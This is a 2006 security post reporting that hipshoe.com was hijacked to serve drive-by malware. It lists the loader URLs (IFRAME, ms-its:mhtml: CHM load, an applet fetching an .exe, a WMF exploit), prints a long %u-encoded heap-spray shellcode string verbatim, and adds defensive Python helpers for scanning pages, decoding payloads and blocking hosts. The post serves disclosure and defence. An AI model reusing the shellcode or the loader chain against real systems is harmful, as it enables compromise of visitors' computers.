
bill_bright writes "www.HipShoe.com has been hijacked. It is a Sponsored Link of Google Search. It was discovered on the results page of Google Search, after entering the word 'slippers'.
It appears the correct page will load, but after a few seconds, AVG alerts to a virus, and a script file attempts to download, install, and run. The virus appears to be a .wmf exploit.
AVG Pro (Ver 267.14.16/225, 1/9/2006) reported the following:

File Name: xpladv493[1].wmf
Discovery: Trojan horse Downloader.Agent.13.AI
Date of detection: 1/10/2006 9:21:38 AM
File Size: 15.66 KB
The above .wmf file was located in the Temporary Internet Files folder.
A report to security@google.com was submitted shortly after discovery.
Note: The thumbnail above right is a snapshot of where hipshoe is advertising on the results page.
Thanks, Bill, for reporting the above; it's Paul replying further...
An assessment of the hipshoe.com web server reveals:
Apache version 1.3.31 and PHP release 4.3.10. The server may well have been hijacked through that old, vulnerable PHP release: it is susceptible to a nasty XML-RPC vulnerability, which is a plausible entry point to the server. They need to upgrade immediately.
A quick view of the page source reveals links to many garbage domains and a script call to:
http://toolbarbucks.biz/dl/adv493.php
That link is pulled in through an IFRAME HTML tag.
The page it loads in turn triggers a JavaScript object load of:
ms-its:mhtml:file://C:nosuch.mht!http://toolbarbucks.biz/dl/adv493/x.chm::/x.htm
It also loads the following through an applet:
http://toolbarbucks.biz/dl/loaderadv493.exe
And there are yet more IFRAME calls, to:
http://toolbarbucks.biz/dl/fillmemadv493.htm
One particular call from another IFRAME is to xpladv493.wmf, yup, another WMF exploit.
That IFRAME page carries the following JavaScript snippet:
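The loader chain above (an IFRAME to an off-site script, an ms-its:mhtml: object load, an applet fetching an .exe, and an IFRAME pointing at a .wmf) is the kind of thing you can triage mechanically from a saved copy of the page instead of loading it in a browser. The following Python script is an added example written for this write-up, not code from the post or from hipshoe.com; the sample HTML it scans is constructed here, modelled on the references the assessment lists, and the BLOCKLIST, RISKY_EXT and RISKY_SCHEMES tables are the reviewer's own assumptions, so extend them to taste.

```python
"""Static triage of a saved HTML page for the drive-by loader pattern
described in the write-up.  Added example; not the post's own code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Loader host named in the write-up.  Anything else here is an assumption.
BLOCKLIST = {"toolbarbucks.biz"}
# Payload types the write-up observed: WMF image, CHM help file, EXE via applet.
RISKY_EXT = (".wmf", ".chm", ".exe")
# Protocol handlers abused by the ms-its:mhtml: object load (assumed list).
RISKY_SCHEMES = ("ms-its:", "mhtml:", "its:")


def _strip_www(host):
    return re.sub(r"^www\.", "", host.lower())


class LoaderScanner(HTMLParser):
    """Collects (element, reason, url) findings while parsing the page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = _strip_www(page_host)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._check(tag, a.get("src"))
        elif tag == "iframe":
            self._check(tag, a.get("src"))
        elif tag == "applet":
            # An applet can fetch its payload via code=, archive= or object=.
            for key in ("code", "archive", "object"):
                self._check(tag, a.get(key))
        elif tag == "param":
            self._check(tag, a.get("value"))
        elif tag in ("object", "embed", "img"):
            self._check(tag, a.get("data") or a.get("src"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inside <script>, treat every quoted string literal as a candidate URL
        # so that object loads built in JavaScript are not missed.
        if self._in_script:
            for m in re.finditer(r"""["']([^"']{4,})["']""", data):
                self._check("script-body", m.group(1))

    def _check(self, where, url):
        """Classify one reference; highest-priority reason wins, one per URL."""
        if not url or not url.strip():
            return
        u = url.strip()
        low = u.lower()
        reason = None
        if low.startswith(RISKY_SCHEMES):
            reason = "risky-scheme"
        else:
            try:
                parts = urlsplit(low)
            except ValueError:
                return
            host = parts.hostname or ""
            own = (host == "" or _strip_www(host) == self.page_host
                   or host.endswith("." + self.page_host))
            if host in BLOCKLIST or any(host.endswith("." + b) for b in BLOCKLIST):
                reason = "blocklisted-domain"
            elif parts.path.endswith(RISKY_EXT):
                reason = "risky-payload-type"
            elif not own and where in ("iframe", "script"):
                reason = "external-" + where
        if reason:
            self.findings.append((where, reason, u))


def scan_page(html, page_host):
    """Return the list of (element, reason, url) findings for a page."""
    scanner = LoaderScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page modelled on the references the write-up describes.
SAMPLE_PAGE = """<html><body>
<h1>Slippers for the whole family</h1>
<img src="/images/slipper.jpg">
<script src="http://cdn.example/jquery.js"></script>
<iframe src="http://toolbarbucks.biz/dl/adv493.php"></iframe>
<iframe src="http://hipshoe.com/promo.html"></iframe>
<iframe src="xpladv493.wmf"></iframe>
<applet code="x.class" archive="http://toolbarbucks.biz/dl/loaderadv493.exe"></applet>
<script>
var o = document.createElement("object");
o.data = "ms-its:mhtml:file://C:nosuch.mht!http://toolbarbucks.biz/dl/adv493/x.chm::/x.htm";
</script>
</body></html>"""

if __name__ == "__main__":
    for element, reason, url in scan_page(SAMPLE_PAGE, "www.hipshoe.com"):
        print(f"{element:12} {reason:20} {url}")
```

Run it against a page saved with wget or curl (never a live browser session) and review every finding; an external script or IFRAME on its own is not proof of compromise, but a blocklisted host, an ms-its: URL, or a .wmf in a frame is exactly the chain the post documents.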
mem = mem + unescape
("%uEED9%uD99B%u2474%u5EF4%uC02B%uF42D%uFFFA%u2BFF"+
"%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u58E9%uFFFB"+
"%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+
"%uC92B%uE981%uFEE7%uFFFF%u7381%uA944%u4A67%u83CD"+
"%uFCEB%uF4E2%u7541%uCD48%uEAA9%uD7FF%u67AA%u404A"+
"%uCF14%uCD4E%u8FA9%uCF25%u67A9%u4F45%u661F%uCD4A"+
"%u27C3%uCD22%u6799%uA54A%u62A5%uCD4A%u67C3%u58B5"+
"%u6369%uCD4A%uA7A2%u4945%u6633%uCD4A%uE220%uC842"+
"%u67A9%u38C1%u8F22%u35C1%u6B10%uCD4F%u94A9%u40EE"+
"%uF02C%uCD4A%u98A9%uA7AA%u0FAD%uFD4A%u67A9%uCD22"+
"%u66A9%uA74A%u98A9%u0DDF%u67AD%uC64A%u6869%uAECE"+
"%u67A8%u444A%u672C%uCD4F%uEAA9%u24CF%u67AA%u9D4A"+
"%uF256%uC9F2%u67A9%u0D41%uE3A6%uCC02%u67A9%u78C7"+
"%u643F%uCD4A%uDA24%uC99A%u67A9%u27A2%u67A8%uC24A"+
"%u562B%uCD4B%u0DA9%uA74A%u0DA9%uA74A%uEAA9%u34CF"+
"%u67AA%u9D4A%uF256%uC99A%u67A9%u0D41%uE3A6%uCC5E"+
"%u67A9%u48C3%u6345%uCD4A%u67C3%uCD20%u64C3%uCD20"+
"%u67C3%u9D20%uE224%uC901%u67A9%u461A%u8B2C%uCD4E"+
"%u37A9%u58B5%u6371%uCD4A%uA7A2%u4945%u674F%uCD4A"+
"%uE220%uC9BA%u67A9%uCC20%u67C1%u8D4A%u0DA9%uA74A"+
"%u0DA9%u404A%u0E2C%uCD4E%u37A9%u48C7%u645C%uCD4A"+
"%uECF9%u3DCF%u67AD%u9D4A%uF256%uC996%u67A9%u0D41"+
"%uE3A6%uCDFA%u67A9%u48C3%u635D%uCD4A%u67C3%uCD20"+
"%u67C3%uCD20%uE222%uC9BE%u67A9%u321A%u873C%uCD4E"+
"%u6CA9%uC28A%uEA2D%uCD4A%uEEA9%u35CF%u67AD%u404A"+
"%u9B2C%uCD4E%u37A9%u3222%u6756%u464A%u672C%uCD4F"+
"%u37A9%u48C1%u635D%uCD4A%u98F9%u19DF%u67AD%uC64A"+
"%u1369%u4696%u9B2C%uCD4E%u6CA9%uB98A%uEA7B%uD7FF"+
"%u67AA%uA54A%u66A9%uCD4A%u98FF%u05DF%u67AD%u404A"+
"%uE02C%uCD4E%u37A9%u321C%uAB3C%uCD4E%uECA9%u7592"+
"%u67AB%uCD4A%u5241%uCD4A%uECA9%uCDF7%u67AC%u464A"+
"%u9B1C%uCD4E%u8FA9%uCD03%u67A9%u48C1%u634D%uCD4A"+
"%u98F9%u79DF%u67AD%uA74A%uEAA8%uD7CF%u67AA%u9D4A"+
"%uF256%uC98E%u67A9%uCD20%uF256%uC9F6%u67A9%uA72A"+
"%u0FA9%uCDCA%u67A9%uA71A%u0DA9%uA549%u67A9%u0D4A"+
"%u98FA%u65DF%u67AD%u444A%u832C%uCD4E%uEEA9%uE90E"+
"%u06B5%uAD89%u67C3%u9B1E%u98FE%u29FF%u67AD%u324A"+
"%uD73C%uCD4E%uEEA9%uE90E%u06B5%uAD89%u00CD%uCDEB"+
"%u27A9%u46D9%u98EA%uB80A%uEC50%uCE11%uF4CF%u4C2C"+
"%u2A92%uB910%uE6B3%uCDA1%u66A9%uAB4A%u5C28%u9707"+
"%u6ADD%u26CB%u67A9%uCD4B%uE6CF%u8071%u12F3%u44B9"+
"%u43F5%uAC56%u076A%u1F79%uE7FF%uCD74%u75DD%uB9EC"+
"%u2551%u9C71%u10B1%uFE5C%u2869%uB8E4%u3954%u25A1"+
"%uEEEF%uE93E%uEEA1%uE91E%u9F89%uAC12%u9E6A%u0A12"+
"%u43ED%uCD56%u67A9%uAC4A%u076A%u15C1%u2C22%u4676"+
"%u6CE5%uCE32%uEC62%uED1B%uB4AA%uF7C1%u9CAA%uA71D"+
"%u8F56%u32E5%u9856%uE038%u20F6%u461D%u43F8%u1E49"+
"%uD0A6%u8F5E%u2622%uCE56%uEC6A%u5D4E%uA4AA%u461C"+
"%u43DD%u4446%uD9AD%u4614%u43D5%u4D4E%u6797%u1C3F"+
"%u3FF1%uACB2%u9E6A%u9512%uA4C8%uBF09%u06CC%uA83E"+
"%u0EEF%uA826%u67E8%uA819%u21DD%uA123%u37CC%uA425"+
"%u13C7%uBF2F%u30A9%uA438%u02DD%uA40C%u02C5%u8E4A"+
"%u08C5%uA839%u06E1%uA924%u02C5%u814A%u06C6%u812E"+
"%u05C0%uAC38%u1EDB%uCD0B%u1FEC%uB923%u15F9%uAE25"+
"%u14CC%uCD39%u0EFF%uB938%u06DC%u8C26%u0BC5%uAE25"+
"%u30A9%uA323%u1FEC%uAE2F%u20A9%uB92F%u1EFA%uB939"+
"%u0ACC%uA40E%u02DB%uB929%u15C6%u8C33%u0BA9%uB939"+
"%u04DB%uB92B%u67A9%uA303%u02DD%uA338%u13CC%uBD05"+
"%u09CC%uCD0B%u09E0%uA83E%u09DB%uB92F%u02FB%uA92B"+
"%u0EEF%uA826%u2EA9%uB924%u15CC%uA824%u24DD%uA325"+
"%u02C7%uB929%u67E8%uB902%u17DD%uBD05%u09CC%uA818"+
"%u12D8%uBE2F%u26DD%u854A%u13DD%u9E3A%u09CC%u9F2E"+
"%u16CC%uA83F%u13DA%uCD0B%u10A9%uA323%u09C0%uB92F"+
"%u0387%uA126%u20A9%u990F%u2AA9%uB725%u0BC0%uAC26"+
"%u5386%uFD64%u4F89%uA229%u17C4%uB92B%u05C0%uA826"+
"%u4792%u9E07%u22E0%uFB6A%u5787%uED71%u0EFE%uA924"+
"%u10C6%uED39%u33E7%uF86A%u5687%uED71%u31FA%uF67B"+
"%u2A89%u8433%u55EC%uED71%u2987%u990F%u2489%u9F06"+
"%u5689%uFC64%u5387%uFF79%u4E9B%uB94A%u08C6%uAF26"+
"%u15C8%uB828%u0CCA%uE339%u0ECB%uCD30%u67A9%uCD4A"+
"%u67A9%uCD4A%u67A9%uCD4A%u48A9%uA12E%u0B86%uAC25"+
"%u02CD%uAC38%u11CD%uF47E%u499A%uB52F%u67CC%uCD4A"+
"%u67A9%uCD4A%u67A9%u914A%u04DA%uB927%u5198%uA864"+
"%u02D1%uCD4A%u67A9%uCD4A%u67A9%uCD4A%u67A9%uCD4A"+
"%u67A9%uCD4A%uEAA9%uCD03")
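A snippet like the one above is a heap-spray payload written as a long run of %uXXXX escapes, which JavaScript's unescape() turns into UTF-16 code units, i.e. two little-endian bytes each in memory. For incident response you want those bytes out of the script and into a file or hash without ever running the page. The script below is an added example for this write-up, not the post's own code; it decodes a constructed sample rather than the real payload above, and the min_units threshold for what counts as a "long run" is an assumption you can tune.

```python
"""Extract %uXXXX-encoded payloads from a script for static analysis.
Added example; not the post's own code."""
import hashlib
import math
import re

U_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")


def decode_unescape_run(text):
    """Turn a run of %uXXXX escapes into the bytes they occupy in memory:
    each code unit becomes two little-endian bytes, as unescape() would."""
    out = bytearray()
    for m in U_ESCAPE.finditer(text):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def find_payload_runs(script_source, min_units=32):
    """Return (offset, blob) for every run of at least min_units escapes.
    The post's snippet splits its payload across many "..."+"..." pieces,
    so adjacent string fragments are merged before searching."""
    merged = re.sub(r'"\s*\+\s*"', "", script_source)
    # Built by concatenation, not %-formatting: "%u" would be a format spec.
    pattern = r"(?:%u[0-9A-Fa-f]{4}){" + str(min_units) + ",}"
    return [(m.start(), decode_unescape_run(m.group(0)))
            for m in re.finditer(pattern, merged)]


def shannon_entropy(blob):
    """Bits per byte; machine code usually sits well above plain text."""
    if not blob:
        return 0.0
    counts = {}
    for b in blob:
        counts[b] = counts.get(b, 0) + 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def summarize(blob):
    """Triage facts worth recording before any deeper analysis."""
    return {"length": len(blob),
            "sha256": hashlib.sha256(blob).hexdigest(),
            "entropy": round(shannon_entropy(blob), 3)}


# Constructed sample in the same shape as the snippet above; the bytes are
# filler ("BA" repeated, then "DCFE"), not a real payload.
SAMPLE_SCRIPT = ('mem = mem + unescape\n'
                 '("%u4142%u4142%u4142%u4142%u4142%u4142"+\n'
                 '"%u4142%u4142%u4142%u4142%u4142%u4142"+\n'
                 '"%u4344%u4546");')

if __name__ == "__main__":
    for offset, blob in find_payload_runs(SAMPLE_SCRIPT, min_units=8):
        print(f"run at {offset}: {summarize(blob)}")
```

Feed it the saved script source and keep the SHA-256 with the incident record; the decoded blob is what you hand to a disassembler or compare against known samples, and a single short escape such as %u00A9 in otherwise normal code will not trip the threshold.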
toolbarbucks.biz, sound familiar? It should: webhelper already identified this domain in December 2005 and called for immediate blocking.
Some of the junk domains hipshoe.com links to:
tkqlhce.com
dpbolvw.net
jdoqocy.com
anrdoezrs.net
kqzyfj.com
Don't visit these pages! I did and saw some alerts and prompts:
Visiting the main site www.hipshoe.com, one sees an innocuous-looking page:
Yet it's not benign: it spawns all sorts of IFRAME and script calls that pull down various nasties:
A couple of virus detections:
The following IE prompt comes up multiple times (clicking Cancel each time); it is triggered by the JavaScript snippet above:
Once it is gone, this alert comes up:

Update: a check of the Event Viewer's Application log revealed nine instances of the following Information event:

Don't permit any kind of scripting to run without first being prompted. In particular, make sure that launching programs and files in an IFRAME is set to Disable or Prompt under Tools | Internet Options:
Thanks go out to Bill Bright and his wife for finding this and reporting it here and to Google. Big thanks also to webhelper (Patrick Jordan) for putting out the huge alert on toolbarbucks.biz. Block all access to that domain!
Add it to your hosts file:
127.0.0.1 toolbarbucks.biz
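Hand-editing the hosts file works for one domain, but once you maintain a list it is easy to add duplicates or miss the www. variant. The helper below is an added example for this write-up, not the post's own code; it merges new blocklist entries into existing hosts-file text only where they are missing, keeps comments and existing lines untouched, and uses the 127.0.0.1 sink the post recommends. The file path is the reader's to supply (for example /etc/hosts, or C:\Windows\System32\drivers\etc\hosts on Windows).

```python
"""Idempotently add blocklist entries to a hosts file.
Added example; not the post's own code."""
import re
from pathlib import Path


def merge_hosts_blocklist(existing_text, domains, sink="127.0.0.1"):
    """Return (new_text, added_names).  Every domain is blocked as both
    'name' and 'www.name'; names already present on any line are skipped."""
    present = set()
    for line in existing_text.splitlines():
        # Ignore trailing comments, then take every hostname after the address.
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            present.add(name.lower())

    lines = existing_text.rstrip("\n").splitlines() if existing_text.strip() else []
    added = []
    for domain in domains:
        base = re.sub(r"^www\.", "", domain.strip().lower())
        for name in (base, "www." + base):
            if name not in present:
                lines.append(f"{sink} {name}")
                present.add(name)
                added.append(name)
    return "\n".join(lines) + "\n", added


def block_in_hosts_file(path, domains):
    """Apply merge_hosts_blocklist to a real file; returns the names added.
    Needs administrator/root rights on the system hosts file."""
    p = Path(path)
    text = p.read_text(encoding="utf-8") if p.exists() else ""
    new_text, added = merge_hosts_blocklist(text, domains)
    if added:
        p.write_text(new_text, encoding="utf-8")
    return added


if __name__ == "__main__":
    # Constructed hosts content: the domain from the post is already there once.
    sample = "127.0.0.1 localhost\n# local overrides\n127.0.0.1 toolbarbucks.biz  # added 2006-01\n"
    new_text, added = merge_hosts_blocklist(sample, ["toolbarbucks.biz"])
    print(new_text, "added:", added)
```

Running the merge twice adds nothing the second time, so it is safe to re-run whenever the blocklist grows.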
Spread the word! Knowledge is power.
Note: Warning, do not visit any of the domains listed in this article.
Updated: 1746 hrs UTC-5. Added the Event Viewer information dialog.
"